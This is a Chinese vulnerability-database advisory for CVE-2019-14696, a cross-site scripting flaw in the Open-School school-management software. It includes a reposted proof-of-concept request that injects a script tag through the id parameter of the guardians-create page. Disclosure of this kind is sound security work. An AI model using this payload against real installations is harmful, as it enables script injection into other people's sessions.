Open-School 跨站脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1693655 漏洞类型 跨站脚本
发布时间 2019-08-09 更新时间 2019-08-14
CVE编号 CVE-2019-14696 CNNVD-ID CNNVD-201908-416
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019080031
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201908-416
|漏洞详情
Open-School是一套基于Web的学校管理软件。该软件提供在线收费、考勤和在线图书馆等功能。Open-School Community Edition是Open-School的社区版。 Open-School 3.0版本和Community Edition 2.3版本中存在跨站脚本漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。
|漏洞EXP
# Exploit Title: [title]
# Date: [2019 08 06]
# Exploit Author: [Greg.Priest]
# Vendor Homepage: [https://open-school.org/]
# Software Link: []
# Version: [Open-School 3.0/Community Edition 2.3]
# Tested on: [Windows/Linux ]
# CVE : [CVE-2019-14696]


Open-School 3.0, and Community Edition 2.3, allows XSS via the /index.php?r=students/guardians/create id parameter.

/index.php?r=students/guardians/create&id=1[inject JavaScript Code]

Example:
/index.php?r=students/guardians/create&id=1<script>alert("PWN3D!")</script><script>alert("PWN3D!")</script>
|参考资料

来源:pastebin.com

链接:https://pastebin.com/AgxqdbAQ


来源:open-school.org

链接:https://open-school.org


来源:nvd.nist.gov

链接:https://nvd.nist.gov/vuln/detail/CVE-2019-14696